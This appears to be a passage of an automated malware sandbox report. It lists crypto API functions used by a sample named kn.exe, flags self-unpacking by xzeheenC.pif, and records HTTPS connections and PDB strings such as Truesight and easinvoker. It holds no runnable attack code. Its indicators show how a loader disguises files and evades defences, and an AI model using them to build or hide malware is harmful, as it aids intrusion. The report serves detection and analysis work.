              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90844 BCryptExportKey,#205,#359,#357,#357,7_2_00007FF792D90844
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D16824 CryptHashCertificate,GetLastError,#357,7_2_00007FF792D16824
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D18600 #357,CryptDecodeObject,GetLastError,LocalFree,7_2_00007FF792D18600
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D525E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF792D525E8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF792D1C5D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D965B4 NCryptIsKeyHandle,_CxxThrowException,7_2_00007FF792D965B4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,7_2_00007FF792D8E57C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCA590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,7_2_00007FF792DCA590
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFA58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,7_2_00007FF792DFA58C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC66D8 NCryptFreeObject,#360,7_2_00007FF792DC66D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,7_2_00007FF792DB86D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D326E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,7_2_00007FF792D326E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D64694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,7_2_00007FF792D64694
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D26694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,7_2_00007FF792D26694
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6654 NCryptGetProperty,#360,7_2_00007FF792DC6654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,7_2_00007FF792D5A654
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D20630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D20630
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC0BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,7_2_00007FF792DC0BF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D92BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF792D92BC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,7_2_00007FF792D1CB98
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC0B9C CryptHashData,GetLastError,#357,7_2_00007FF792DC0B9C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,7_2_00007FF792DBCBB4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90B80 NCryptCreatePersistedKey,#205,#359,#359,#357,7_2_00007FF792D90B80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFEB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,7_2_00007FF792DFEB38
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D82CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,7_2_00007FF792D82CF8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D92CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,7_2_00007FF792D92CFC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90D14 NCryptFinalizeKey,#205,#357,#357,7_2_00007FF792D90D14
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6CE0 NCryptEnumStorageProviders,#360,7_2_00007FF792DC6CE0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE8CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,7_2_00007FF792DE8CF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D54CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free,7_2_00007FF792D54CC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D84CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792D84CA0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9ACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,7_2_00007FF792D9ACAC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D92C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,7_2_00007FF792D92C80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD4C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,7_2_00007FF792DD4C80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6C88 NCryptEnumAlgorithms,#360,7_2_00007FF792DC6C88
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC8C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,7_2_00007FF792DC8C58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90C3C NCryptExportKey,#205,#359,#359,#357,7_2_00007FF792D90C3C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF6C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,7_2_00007FF792CF6C4C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,7_2_00007FF792D2CC24
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6C30 NCryptOpenStorageProvider,#360,7_2_00007FF792DC6C30
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7AA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,7_2_00007FF792D7AA00
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCA9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF792DCA9F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,7_2_00007FF792D5E9F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9099C BCryptOpenAlgorithmProvider,#205,#359,#359,7_2_00007FF792D9099C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D529A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF792D529A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC2994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,7_2_00007FF792DC2994
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF792D1C960
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D98940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,7_2_00007FF792D98940
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9C940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,7_2_00007FF792D9C940
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D32B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,7_2_00007FF792D32B00
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D88AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,7_2_00007FF792D88AFC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D92AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,7_2_00007FF792D92AE4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90ABC BCryptVerifySignature,#205,#357,#357,#357,#357,7_2_00007FF792D90ABC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D98AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF792D98AA0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF792D7EA7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC2A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,7_2_00007FF792DC2A78
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D06A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,7_2_00007FF792D06A84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90A18 BCryptSetProperty,#205,#359,#357,#357,7_2_00007FF792D90A18
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D94A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,7_2_00007FF792D94A1C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D74A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,7_2_00007FF792D74A34
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC700C BCryptEnumAlgorithms,#360,7_2_00007FF792DC700C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90FB4 NCryptOpenKey,#205,#359,#357,#357,7_2_00007FF792D90FB4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6FAC BCryptOpenAlgorithmProvider,#360,7_2_00007FF792DC6FAC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D24F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357,7_2_00007FF792D24F90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D80F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF792D80F58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree,7_2_00007FF792DBEF74
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D74F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF792D74F50
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D28F1C strcmp,LocalFree,strcmp,LocalFree,strcmp,LocalFree,strcmp,CryptDecodeObject,LocalFree,LocalFree,LocalFree,strcmp,strcmp,strcmp,strcmp,LocalFree,GetLastError,#357,GetLastError,GetLastError,7_2_00007FF792D28F1C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6F2C NCryptExportKey,#360,7_2_00007FF792DC6F2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D910D8 NCryptSetProperty,#205,#359,#357,#359,#357,7_2_00007FF792D910D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D930D8 CryptGetHashParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF792D930D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC70C8 BCryptSetProperty,#360,7_2_00007FF792DC70C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9B0A0 memmove,CryptDecrypt,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,memmove,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF792D9B0A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5B098 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyCRLTimeValidity,CertCompareCertificateName,CertCompareCertificateName,#357,7_2_00007FF792D5B098
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D3107C LocalFree,GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,#359,#357,LocalFree,7_2_00007FF792D3107C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D91058 NCryptOpenStorageProvider,#205,#359,#357,7_2_00007FF792D91058
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC705C BCryptGetProperty,#360,7_2_00007FF792DC705C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D07034 #357,CertCreateCertificateContext,#357,CertDuplicateCertificateContext,CertCreateCertificateContext,CertCompareCertificateName,CryptVerifyCertificateSignature,GetLastError,#357,#357,CertFreeCertificateContext,LocalFree,CertFreeCertificateContext,7_2_00007FF792D07034
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D0302F #357,LocalFree,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,7_2_00007FF792D0302F
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D97020 NCryptDecrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,NCryptEncrypt,#205,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,7_2_00007FF792D97020
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9301C CryptGenKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF792D9301C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D89028 #357,#357,CryptMsgClose,CryptMsgClose,CertCloseStore,LocalFree,7_2_00007FF792D89028
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6DE0 NCryptCreatePersistedKey,#360,7_2_00007FF792DC6DE0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D74DDC GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,7_2_00007FF792D74DDC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE0DB8 CryptMsgGetParam,GetLastError,#357,#357,memset,CryptMsgGetParam,GetLastError,#357,7_2_00007FF792DE0DB8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB8DD0 CertGetCRLContextProperty,GetLastError,#357,memcmp,CertGetCRLContextProperty,GetLastError,#357,memcmp,CertFindExtension,GetLastError,memcmp,CryptHashCertificate,GetLastError,memcmp,CryptHashPublicKeyInfo,GetLastError,memcmp,LocalFree,7_2_00007FF792DB8DD0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90DD4 NCryptGetProperty,#205,#359,#357,#359,#357,7_2_00007FF792D90DD4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC2DAC #357,#357,CryptFindOIDInfo,LocalFree,7_2_00007FF792DC2DAC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90D84 NCryptFreeObject,#205,#357,7_2_00007FF792D90D84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D92D78 CryptEncrypt,#205,GetLastError,#357,#357,#357,#357,SetLastError,7_2_00007FF792D92D78
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6D78 NCryptOpenKey,#360,7_2_00007FF792DC6D78
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D52D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,7_2_00007FF792D52D18
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6D2C NCryptFreeBuffer,#360,7_2_00007FF792DC6D2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D90EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF792D90EF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF0ED0 LocalAlloc,LocalReAlloc,#357,#360,CryptFindOIDInfo,CryptFindOIDInfo,LocalAlloc,#357,memmove,_wcsnicmp,#256,#359,7_2_00007FF792DF0ED0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6EA8 NCryptImportKey,#360,7_2_00007FF792DC6EA8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D62E7C #223,GetLastError,#358,#357,CryptVerifyCertificateSignature,GetLastError,#357,LocalFree,LocalFree,7_2_00007FF792D62E7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBEE94 CryptSignMessage,SetLastError,7_2_00007FF792DBEE94
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D30E94 GetLastError,#359,CryptGetProvParam,LocalFree,#357,LocalFree,CryptReleaseContext,7_2_00007FF792D30E94
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD4E58 NCryptIsKeyHandle,#357,BCryptGenRandom,#360,LocalAlloc,CryptExportPKCS8,GetLastError,LocalAlloc,CryptExportPKCS8,GetLastError,NCryptIsKeyHandle,#359,#359,NCryptFinalizeKey,#360,7_2_00007FF792DD4E58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D92E6C CryptFindOIDInfo,#205,#357,#357,#357,#359,#359,#357,#357,#359,LocalFree,7_2_00007FF792D92E6C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC6E48 NCryptSetProperty,#360,7_2_00007FF792DC6E48
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D20E24 #357,#357,CryptDecodeObject,GetLastError,GetLastError,strcmp,GetLastError,#357,#357,#357,GetLastError,GetLastError,GetLastError,CryptDecodeObject,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D20E24

              Compliance

              barindex
              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 16.2.xzeheenC.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\xzeheenC.pifUnpacked PE file: 22.2.xzeheenC.pif.400000.0.unpack
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 54.231.224.185:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49931 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1610085610.0000000020750000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207E3000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207D0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: _.pdb source: xzeheenC.pif, 00000010.00000002.2757077847.000000002B33B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000003.1588311534.0000000029952000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000003.1584508014.000000002991A000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2762606604.000000002DCD0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2761760799.000000002C591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2762571543.0000000033961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2762982213.0000000034CA0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 00000016.00000003.1742091076.0000000030AE6000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2757793426.000000003251B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2756654724.0000000030ADD000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000003.1711857093.0000000030AAE000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000003.1811611837.0000000020765000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2756450097.000000002227B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2763742215.0000000023781000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757133357.00000000226C0000.00000004.08000000.00040000.00000000.sdmp, xzeheenC.pif, 0000001A.00000003.1788843721.000000002072D000.00000004.00000020.00020000.00000000.sdmp
